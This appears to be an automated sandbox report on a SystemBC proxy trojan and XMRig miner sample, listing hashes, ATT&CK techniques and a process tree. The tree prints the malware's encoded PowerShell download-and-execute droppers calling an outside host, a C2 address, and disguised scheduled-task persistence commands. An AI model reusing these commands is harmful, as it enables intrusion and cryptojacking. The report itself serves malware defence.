systembc | d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97

Analysis

max time kernel
124s
max time network
143s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
04-05-2023 11:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

95KB
MD5

92e79e8ed958f7289702c96fe03de5a5
SHA1

e16dede58a351b4bcc4e7b973fdec6c3ec3e98ce
SHA256

d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97
SHA512

fa0225f2f28eefd066a4d803586f7edcd3416b05c64ee6070e3d55a327ba7d68d245b7f669975d9aa34d7edc3a585fe05e633a38dfa19469488c58e09b832943
SSDEEP

1536:BfbO0u8DiUPCrElGBWHNC68MVlPjgNJiWUex4bmR+w/Y2tKSG8xB2ncSVKC29m+l:VbEUPCrElGsHNC68MVlPjgNJiWUexfNh

Score

10^/10

systembc xmrig evasion miner persistence trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/o.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/r.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/file.png

Extracted

Family

systembc

185.161.248.16:4440

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs

Processes:

OneDrive.exeOneDrive.exe

description	pid	process	target process
PID 1872 created 1256	1872	OneDrive.exe	Explorer.EXE
PID 1872 created 1256	1872	OneDrive.exe	Explorer.EXE
PID 1872 created 1256	1872	OneDrive.exe	Explorer.EXE
PID 1676 created 1256	1676	OneDrive.exe	Explorer.EXE
PID 1676 created 1256	1676	OneDrive.exe	Explorer.EXE
PID 1676 created 1256	1676	OneDrive.exe	Explorer.EXE
PID 1676 created 1256	1676	OneDrive.exe	Explorer.EXE

SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

dllhost.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dllhost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	dllhost.exe

XMRig Miner payload 11 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1676-165-0x000000013F040000-0x000000013FA0A000-memory.dmp	xmrig
behavioral1/memory/1676-167-0x000000013F040000-0x000000013FA0A000-memory.dmp	xmrig
behavioral1/memory/2000-174-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2000-181-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2000-186-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2000-190-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2000-194-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2000-198-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2000-202-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2000-206-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2000-210-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

5 888 powershell.exe
6 268 powershell.exe
7 1684 powershell.exe
10 888 powershell.exe
11 888 powershell.exe
11 888 powershell.exe
Downloads MZ/PE file

flow	pid	process
5	888	powershell.exe
6	268	powershell.exe
7	1684	powershell.exe
10	888	powershell.exe
11	888	powershell.exe
11	888	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

dllhost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dllhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dllhost.exe

Executes dropped EXE 5 IoCs

Processes:

OneDrive.exedllhost.exeOneDrive.exelsass.exelsass.exe

pid process

1872 OneDrive.exe
1496 dllhost.exe
1676 OneDrive.exe
1220 lsass.exe
1868 lsass.exe
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

dllhost.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000\Software\Wine dllhost.exe
Loads dropped DLL 3 IoCs

Processes:

powershell.exetaskeng.exelsass.exe

pid process

888 powershell.exe
932 taskeng.exe
1220 lsass.exe

pid	process
1872	OneDrive.exe
1496	dllhost.exe
1676	OneDrive.exe
1220	lsass.exe
1868	lsass.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000\Software\Wine	dllhost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

lsass.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe"	lsass.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

Processes:

dllhost.exelsass.exelsass.exe

pid process

1496 dllhost.exe
1220 lsass.exe
1220 lsass.exe
1868 lsass.exe
1868 lsass.exe
1868 lsass.exe
1868 lsass.exe
1868 lsass.exe
1868 lsass.exe

pid	process
1496	dllhost.exe
1220	lsass.exe
1220	lsass.exe
1868	lsass.exe
1868	lsass.exe
1868	lsass.exe
1868	lsass.exe
1868	lsass.exe
1868	lsass.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

OneDrive.exe

description	pid	process	target process
PID 1676 set thread context of 1600	1676	OneDrive.exe	conhost.exe
PID 1676 set thread context of 2000	1676	OneDrive.exe	conhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

864 schtasks.exe
1300 schtasks.exe
528 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

684 timeout.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

lsass.exe

pid process

1868 lsass.exe

pid	process
864	schtasks.exe
1300	schtasks.exe
528	schtasks.exe

pid	process
684	timeout.exe

pid	process
1868	lsass.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeOneDrive.exedllhost.exeOneDrive.exepowershell.exe

pid	process
888	powershell.exe
268	powershell.exe
1172	powershell.exe
1684	powershell.exe
888	powershell.exe
888	powershell.exe
1872	OneDrive.exe
1872	OneDrive.exe
1872	OneDrive.exe
1872	OneDrive.exe
1872	OneDrive.exe
1872	OneDrive.exe
888	powershell.exe
888	powershell.exe
1496	dllhost.exe
888	powershell.exe
888	powershell.exe
1676	OneDrive.exe
1676	OneDrive.exe
1676	OneDrive.exe
1676	OneDrive.exe
1996	powershell.exe
1676	OneDrive.exe
1676	OneDrive.exe
1676	OneDrive.exe
1676	OneDrive.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
460

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exelsass.exelsass.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	888	powershell.exe
Token: SeDebugPrivilege	268	powershell.exe
Token: SeDebugPrivilege	1172	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeShutdownPrivilege	1068	powercfg.exe
Token: SeShutdownPrivilege	1856	powercfg.exe
Token: SeShutdownPrivilege	1772	powercfg.exe
Token: SeShutdownPrivilege	1480	powercfg.exe
Token: SeShutdownPrivilege	1936	powercfg.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeShutdownPrivilege	1692	powercfg.exe
Token: SeShutdownPrivilege	1556	powercfg.exe
Token: SeShutdownPrivilege	1584	powercfg.exe
Token: SeDebugPrivilege	1220	lsass.exe
Token: SeDebugPrivilege	1868	lsass.exe
Token: SeLockMemoryPrivilege	2000	conhost.exe
Token: SeLockMemoryPrivilege	2000	conhost.exe

Suspicious use of FindShellTrayWindow 56 IoCs

Processes:

conhost.exe

pid	process
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe

Suspicious use of SendNotifyMessage 56 IoCs

Processes:

conhost.exe

pid	process
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe
2000	conhost.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

lsass.exelsass.exe

pid process

1220 lsass.exe
1868 lsass.exe

pid	process
1220	lsass.exe
1868	lsass.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exepowershell.execmd.exetaskeng.execmd.exepowershell.exeOneDrive.exelsass.exe

description	pid	process	target process
PID 1704 wrote to memory of 1172	1704	file.exe	powershell.exe
PID 1704 wrote to memory of 1172	1704	file.exe	powershell.exe
PID 1704 wrote to memory of 1172	1704	file.exe	powershell.exe
PID 1704 wrote to memory of 1684	1704	file.exe	powershell.exe
PID 1704 wrote to memory of 1684	1704	file.exe	powershell.exe
PID 1704 wrote to memory of 1684	1704	file.exe	powershell.exe
PID 1704 wrote to memory of 888	1704	file.exe	powershell.exe
PID 1704 wrote to memory of 888	1704	file.exe	powershell.exe
PID 1704 wrote to memory of 888	1704	file.exe	powershell.exe
PID 1704 wrote to memory of 268	1704	file.exe	powershell.exe
PID 1704 wrote to memory of 268	1704	file.exe	powershell.exe
PID 1704 wrote to memory of 268	1704	file.exe	powershell.exe
PID 888 wrote to memory of 1872	888	powershell.exe	OneDrive.exe
PID 888 wrote to memory of 1872	888	powershell.exe	OneDrive.exe
PID 888 wrote to memory of 1872	888	powershell.exe	OneDrive.exe
PID 1980 wrote to memory of 1068	1980	cmd.exe	powercfg.exe
PID 1980 wrote to memory of 1068	1980	cmd.exe	powercfg.exe
PID 1980 wrote to memory of 1068	1980	cmd.exe	powercfg.exe
PID 1980 wrote to memory of 1856	1980	cmd.exe	powercfg.exe
PID 1980 wrote to memory of 1856	1980	cmd.exe	powercfg.exe
PID 1980 wrote to memory of 1856	1980	cmd.exe	powercfg.exe
PID 1980 wrote to memory of 1772	1980	cmd.exe	powercfg.exe
PID 1980 wrote to memory of 1772	1980	cmd.exe	powercfg.exe
PID 1980 wrote to memory of 1772	1980	cmd.exe	powercfg.exe
PID 1980 wrote to memory of 1480	1980	cmd.exe	powercfg.exe
PID 1980 wrote to memory of 1480	1980	cmd.exe	powercfg.exe
PID 1980 wrote to memory of 1480	1980	cmd.exe	powercfg.exe
PID 888 wrote to memory of 1496	888	powershell.exe	dllhost.exe
PID 888 wrote to memory of 1496	888	powershell.exe	dllhost.exe
PID 888 wrote to memory of 1496	888	powershell.exe	dllhost.exe
PID 888 wrote to memory of 1496	888	powershell.exe	dllhost.exe
PID 932 wrote to memory of 1676	932	taskeng.exe	OneDrive.exe
PID 932 wrote to memory of 1676	932	taskeng.exe	OneDrive.exe
PID 932 wrote to memory of 1676	932	taskeng.exe	OneDrive.exe
PID 888 wrote to memory of 1220	888	powershell.exe	lsass.exe
PID 888 wrote to memory of 1220	888	powershell.exe	lsass.exe
PID 888 wrote to memory of 1220	888	powershell.exe	lsass.exe
PID 888 wrote to memory of 1220	888	powershell.exe	lsass.exe
PID 1928 wrote to memory of 1936	1928	cmd.exe	powercfg.exe
PID 1928 wrote to memory of 1936	1928	cmd.exe	powercfg.exe
PID 1928 wrote to memory of 1936	1928	cmd.exe	powercfg.exe
PID 1928 wrote to memory of 1692	1928	cmd.exe	powercfg.exe
PID 1928 wrote to memory of 1692	1928	cmd.exe	powercfg.exe
PID 1928 wrote to memory of 1692	1928	cmd.exe	powercfg.exe
PID 1928 wrote to memory of 1556	1928	cmd.exe	powercfg.exe
PID 1928 wrote to memory of 1556	1928	cmd.exe	powercfg.exe
PID 1928 wrote to memory of 1556	1928	cmd.exe	powercfg.exe
PID 1928 wrote to memory of 1584	1928	cmd.exe	powercfg.exe
PID 1928 wrote to memory of 1584	1928	cmd.exe	powercfg.exe
PID 1928 wrote to memory of 1584	1928	cmd.exe	powercfg.exe
PID 1996 wrote to memory of 1300	1996	powershell.exe	schtasks.exe
PID 1996 wrote to memory of 1300	1996	powershell.exe	schtasks.exe
PID 1996 wrote to memory of 1300	1996	powershell.exe	schtasks.exe
PID 1676 wrote to memory of 1600	1676	OneDrive.exe	conhost.exe
PID 1220 wrote to memory of 528	1220	lsass.exe	schtasks.exe
PID 1220 wrote to memory of 528	1220	lsass.exe	schtasks.exe
PID 1220 wrote to memory of 528	1220	lsass.exe	schtasks.exe
PID 1220 wrote to memory of 528	1220	lsass.exe	schtasks.exe
PID 1220 wrote to memory of 1868	1220	lsass.exe	lsass.exe
PID 1220 wrote to memory of 1868	1220	lsass.exe	lsass.exe
PID 1220 wrote to memory of 1868	1220	lsass.exe	lsass.exe
PID 1220 wrote to memory of 1868	1220	lsass.exe	lsass.exe
PID 1220 wrote to memory of 956	1220	lsass.exe	cmd.exe
PID 1220 wrote to memory of 956	1220	lsass.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:888

C:\Users\Admin\AppData\Roaming\OneDrive.exe
"C:\Users\Admin\AppData\Roaming\OneDrive.exe"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1872

C:\Users\Admin\AppData\Roaming\dllhost.exe
"C:\Users\Admin\AppData\Roaming\dllhost.exe"
4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1496

C:\Users\Admin\AppData\Roaming\lsass.exe
"C:\Users\Admin\AppData\Roaming\lsass.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1220

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 13:11 /du 23:59 /sc daily /ri 1 /f
5⤵
- Creates scheduled task(s)
PID:528

C:\ProgramData\lsass\lsass.exe
"C:\ProgramData\lsass\lsass.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1868

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpD73D.tmp.bat""
5⤵
PID:956

C:\Windows\SysWOW64\timeout.exe
timeout 7
6⤵
- Delays execution with timeout.exe
PID:684

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1068

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1856

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
2⤵
PID:1100

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
3⤵
- Creates scheduled task(s)
PID:864

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "OneDrive"
2⤵
PID:1348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
3⤵
- Creates scheduled task(s)
PID:1300

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1928

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1936

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1692

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
PID:1600

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2000

C:\Windows\system32\taskeng.exe
taskeng.exe {5A0F8D62-427A-4247-AB2F-707A9EFB5F4C} S-1-5-21-3948302646-268491222-1934009652-1000:KXZDHPUW\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:932

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1676

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\lsass\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
C:\ProgramData\lsass\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD73D.tmp.bat

Filesize
154B

MD5
f65f0849d6c5cdb941bf796d05c4b6ba

SHA1
1a9e41a79c84170c2d0ea2efa3b2b3a56a912918

SHA256
70f531d5890a88bdc95401aa9234d48d447db6c9148a66278caab3bf878b94ab

SHA512
17619eb9b88cdc0c7a9be3392fe172796d481679841c0554841ece31186fd09bc283f346df89a0f90edee41e656188fe73cf78d481b940cee17e1a32c2d58abb

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD73D.tmp.bat

Filesize
154B

MD5
f65f0849d6c5cdb941bf796d05c4b6ba

SHA1
1a9e41a79c84170c2d0ea2efa3b2b3a56a912918

SHA256
70f531d5890a88bdc95401aa9234d48d447db6c9148a66278caab3bf878b94ab

SHA512
17619eb9b88cdc0c7a9be3392fe172796d481679841c0554841ece31186fd09bc283f346df89a0f90edee41e656188fe73cf78d481b940cee17e1a32c2d58abb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
401674612435a6f7e662f3650aa496ff

SHA1
844e3d3afeed1e0d03baf6b3967ed90bac4c0409

SHA256
49d04f3197eed5b91b740cbe795a6e11eb802ba6d6202791973f3606190fe5dd

SHA512
3d159657f6419912fe5791ba6bb42d1d863b9e2666932ccd195a2d381e280c9ab8088cafa7dc543d3cabea4674a9bec27ae1a891c3a1ecc192714b26e0a4c46d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
401674612435a6f7e662f3650aa496ff

SHA1
844e3d3afeed1e0d03baf6b3967ed90bac4c0409

SHA256
49d04f3197eed5b91b740cbe795a6e11eb802ba6d6202791973f3606190fe5dd

